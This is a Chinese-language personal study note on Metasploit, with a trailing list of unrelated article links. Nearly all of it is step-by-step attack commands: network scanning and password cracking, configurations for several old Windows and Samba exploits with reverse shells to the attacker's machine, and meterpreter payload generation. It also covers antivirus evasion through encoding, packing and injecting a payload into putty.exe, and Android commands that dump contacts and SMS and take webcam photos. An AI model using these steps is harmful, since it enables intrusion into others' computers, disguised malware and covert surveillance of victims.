msf入门学习笔记
msf
——————————————————————————————————————
service postgresql start
service metasploit start
msfconsole
进入后输入db_status 查看数据库连接状态
workspace -a test 创建工作台
Workspace test 进入工作台
信息收集
msf> whois xxx.com
msf>whois 192.168.1.100
在线收集服务器ip信息工具 :
http://searchdns.netcraft.com/
nmap -sS xxx (-O 看操作系统)
msf>use auxiliary/scanner/ip/ipidseq 看某个网段谁开了**端口。 show options 看配置。set ** 设置。run 开始
msf>use auxiliary/scanner/portscan/syn 扫描开放端口 set RHOSTS *** 。set THREADS 50
msf>use auxiliary/scanner/smb/smb_version 扫描网段开放445的 。 set RHOSTS 192.168.2.0/24 。set THREADS 50
msf>use auxiliary/scanner/mssql/mssql_ping 扫描开放mssql
msf>use auxiliary/scanner/ssh/ssh_version 扫描网段ssh服务器
msf>use auxiliary/scanner/telnet/telnet_version 扫描网段telnet
msf>use auxiliary/scanner/ftp/ftp_version 扫描网段ftp
msf>use auxiliary/scanner/ftp/anonymous 扫描网段ftp可匿名登录的
msf>use auxiliary/scanner/discovery/arp_sweep 存活主机
msf>use auxiliary/scanner/http/dir_scanner 网站目录
msf>use auxiliary/scanner/snmp/snmp_login 扫描snmp主机
msf>use auxiliary/gather/search_email_collector 搜索网站中email地址 set DOMAIN **.com
msf>use auxiliary/sniffer/psnuffle 嗅探抓包(ftp密码)
search mysql_login 搜索mysql口令破解模块,并利用
search postgre_login 搜索post sql口令破解模块
telnet
search tomcat_mgr_login 搜索tomcat口令破解模
search ssh_login 搜索ssh口令破解模块
msf>use auxiliary/scanner/smb/samba_version 破解samba
微软等漏洞利用 如
ms10_002 (浏览器漏洞):
msf>search ms10_002
msf>use exploit/windows/browser/ms10_002_aurora
msf>set SRVHOST 192.168... 本机ip
msf>set payload windows/meterpreter/reverse_tcp 侦听反弹shell载荷
msf>set SRVPORT 80 接受的端口 不设置默认8080
msf>set URIPATH / 可有无 根目录
msf>set LHOST 192.168... 本机ip
msf>set LPORT 1211 本地端口
msf>exploit 攻击
会有生成一个网址 给目标打开,之后返回 一些信息 session 1
之后 输入 msf>session -i 查看会话和id*
使用 msf>sessions -i *
meterpreter>shell 获得shell 可输入cmd命令ipconfig whoami
ctrl z 退出 ctrl c 后台运行
————————
ms10_018 (浏览器漏洞):
msf>search ms10_018
msf>set SRVHOST 192.168... 本机ip
msf>set SRVPORT 8081 注意冲突
msf>set payload windows/shell/reverse_tcp 用shell 攻击性低
msf>set LHOST 192.168... 本机ip
msf>set LPORT 1211 本地端口
msf>exploit 攻击
会有生成一个网址 给目标打开
输入 msf>session -i 查看会话和id*
————————*****蓝屏
ms12_020 (需要开3389 在win 输入netstat -an |find“3389” 查)
search 结果 第二个搜索漏洞 第一个利用
————————
ms10_046 (范围广泛)
msf>set SRVHOST 192.168...
msf>set SRVPORT 80
msf>set payload windows/shell/reverse_tcp
msf>set LHOST 192.168...
msf>set LPORT
生成两个 一个是共享(//***)另个为网址 转化后和第一个一样 里面有文件,打开即可
————————
ms08_067 (早期,测试,范围广)
msf>use
msf>set RHOST ***(mubiao)
msf>s
(show target)
msf>set target ** 填目标版本对应的id
————————
ms12_004 浏览器 xpsp3 ,ie 6 7 8 *
msf>use
msf>set payload windows/meterpreter/reverse_tcp
msf>set SRVHOST 192.168...
msf>set SRVPORT **
msf>set LHOST 192.168...
msf>set LPORT
exploit
————————
linux samba 漏洞 适应版本 debain 3.1*3.2
search samba
use linux/samba/lsa_transnames_heap
show payload
set payload linux /x86/shell_bind_tcp ?
set LPORT 8080
set RHOST 192.168
exploit
————————
dll 注入(到目标系统)
use exploit/windows/browser/wendab_dll_hijacker
msf>set payload windows/meterpreter/reverse_tcp
msf>set SRVHOST 192.168...
msf>set SRVPORT 80 必须80
msf>set RHORT **
msf>set LHOST 192.168...
msf>set LPORT
msf>set urlpath /
————————————————————————————————————————————————
shellcode 使用
(少于远控 功能单一 可以生成 windows linux andriond java php)
——————
windows
-# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >shy.exe
****
****编码免杀 (-t 输出形式;-c编码次数,次数过多可能会使shellcode失 效;-e 加编码类型 ;可用msfencode -l 查看所有编码)
-# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 R|msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/countdown -c 5 -t exe -o /root/shy.exe
****
****加壳免杀 (upx壳)
-#upx -5 shy.exe
****
****veil 免杀
****
****shellter免杀 (shellcode代码注入工具)
找一个正常运行的exe,如putty.exe,向其注入。将工具shellterv4放入kali,解压unzip shellter_v4.0.zip,进入所解压的目录,运行shellter.exe(提升其权限,chmod 777 shellter.exe).(A/M/H,选A).PE Target: /root/putty.exe (L/C/H 选L 后输入1)。set LHOST: *** 。 SET LPORT ** 。
配置监听载荷:
msf>use payload windows/meterpreter/reverse_tcp
msf>set LHOST **
msf>set LPORT **
****
****
msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_tcp
msf>set LHOST ***133
msf>set LPORT 一致
exploit
可以用 -# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=* LPORT=* E
——————
linux
-# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >/root/shy.exe
监听
msf>use exploit/multi/handler
msf>set payload linux /x86/meterpreter/reverse_tcp
msf>set LHOST ***133
msf>set LPORT 一致
exploit
可以用 -# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=* LPORT=* E
在目标linux中修改exe权限 # chmod 777 shy。exe
然后。/shy 执行
——————
android
-# msfpayload andriod/meterpreter/reverse_tcp LHOST=** LPORT=1211 R>/root/shy.apk
监听
msf>use exploit/multi/handler
msf>set payload andriod/meterpreter/reverse_tcp
msf>set LHOST ***133
msf>set LPORT 一致
exploit
dump_contacts 到出电话
dump_sms
Webcam_list 看有几个摄像头
-i 1 选择后面摄像头
webcam_snap 拍照
webcam_stream 开摄像头
msf入门学习笔记的更多相关文章
- Hadoop入门学习笔记---part4
紧接着<Hadoop入门学习笔记---part3>中的继续了解如何用java在程序中操作HDFS. 众所周知,对文件的操作无非是创建,查看,下载,删除.下面我们就开始应用java程序进行操 ...
- Hadoop入门学习笔记---part3
2015年元旦,好好学习,天天向上.良好的开端是成功的一半,任何学习都不能中断,只有坚持才会出结果.继续学习Hadoop.冰冻三尺,非一日之寒! 经过Hadoop的伪分布集群环境的搭建,基本对Hado ...
- PyQt4入门学习笔记(三)
# PyQt4入门学习笔记(三) PyQt4内的布局 布局方式是我们控制我们的GUI页面内各个控件的排放位置的.我们可以通过两种基本方式来控制: 1.绝对位置 2.layout类 绝对位置 这种方式要 ...
- PyQt4入门学习笔记(一)
PyQt4入门学习笔记(一) 一直没有找到什么好的pyqt4的教程,偶然在google上搜到一篇不错的入门文档,翻译过来,留以后再复习. 原始链接如下: http://zetcode.com/gui/ ...
- Hadoop入门学习笔记---part2
在<Hadoop入门学习笔记---part1>中感觉自己虽然总结的比较详细,但是始终感觉有点凌乱.不够系统化,不够简洁.经过自己的推敲和总结,现在在此处概括性的总结一下,认为在准备搭建ha ...
- Hadoop入门学习笔记---part1
随着毕业设计的进行,大学四年正式进入尾声.任你玩四年的大学的最后一次作业最后在激烈的选题中尘埃落定.无论选择了怎样的选题,无论最后的结果是怎样的,对于大学里面的这最后一份作业,也希望自己能够尽心尽力, ...
- Scala入门学习笔记三--数组使用
前言 本篇主要讲Scala的Array.BufferArray.List,更多教程请参考:Scala教程 本篇知识点概括 若长度固定则使用Array,若长度可能有 变化则使用ArrayBuffer 提 ...
- OpenCV入门学习笔记
OpenCV入门学习笔记 参照OpenCV中文论坛相关文档(http://www.opencv.org.cn/) 一.简介 OpenCV(Open Source Computer Vision),开源 ...
- stylus入门学习笔记
title: stylus入门学习笔记 date: 2018-09-06 17:35:28 tags: [stylus] description: 学习到 vue, 有人推荐使用 stylus 这个 ...
随机推荐
- hbase-1.2.5完全分布式部署
详细配置参考http://abloz.com/hbase/book.html#distributed ,2.2.2.2小节 1.修改hbase-site.xml文件.添加如下配置 cluster为ha ...
- mvc4 实现自己的权限验证 仿Authorize与AllowAnonymous原理
参考文章 :http://www.cosdiv.com/page/M0/S878/878978.html 实现的效果:在控制器上(Controller)验证权限,在动作(Action)上不验证. 用M ...
- 特征提取方法: one-hot 和 IF-IDF
one-hot 和 IF-IDF是目前最为常见的用于提取文本特征的方法,本文主要介绍两种方法的思想以及优缺点. 1. one-hot 1.1 one-hot编码 什么是one-hot编码?one-ho ...
- 使用Mongodb+Shiro+SpringMVC实现动态权限分配
此次的文档只对Mongodb整合Shiro并且实现动态权限分配做整理,其它的内容以后会补上. 第一步.创建在web.xml中配置 Spring .Shiro shiroFilter 过滤器是用来将请求 ...
- this指向(匿名函数问题)
1.匿名函数中 this一般指向window对象 2.闭包函数中的this,指向window var mod = { init: function(){ console.log('this',this ...
- addEventListener和attachEvent二者绑定的执行函数中的this不相同【转载】
yuanwen http://www.jb51.net/article/32511.htm 写 addEventListener 和 attachEvent 区别的博文不少,不过大部分都把重点放置于前 ...
- HTML5轻松实现拍照上传功能[转载]
转载 http://www.18sucai.com/article/275.htm 传统方法如果想实现拍照功能,需要后台应用程序复杂的编写,但随着html5的发展,在HTML5规范的支持下,Web A ...
- 【深度学习系列】PaddlePaddle之数据预处理
上篇文章讲了卷积神经网络的基本知识,本来这篇文章准备继续深入讲CNN的相关知识和手写CNN,但是有很多同学跟我发邮件或私信问我关于PaddlePaddle如何读取数据.做数据预处理相关的内容.网上看的 ...
- nohup和&后台运行,查看占用端口进程
1.nohup 用途:不挂断地运行命令. 语法:nohup Command [ Arg - ] [ & ] 无论是否将 nohup 命令的输出重定向到终端,输出都将附加到当前目录的 nohup ...
- openstack学习心得:glance 架构、概念、后端存储配置方式
glance 架构 glance 服务概述 Image 服务 使得用户可以发现.注册.检索虚拟机镜像.它对外提供REST API使得你能够查询虚拟机镜像元数据和检索一个真实的镜像.你可以通过镜像服务将 ...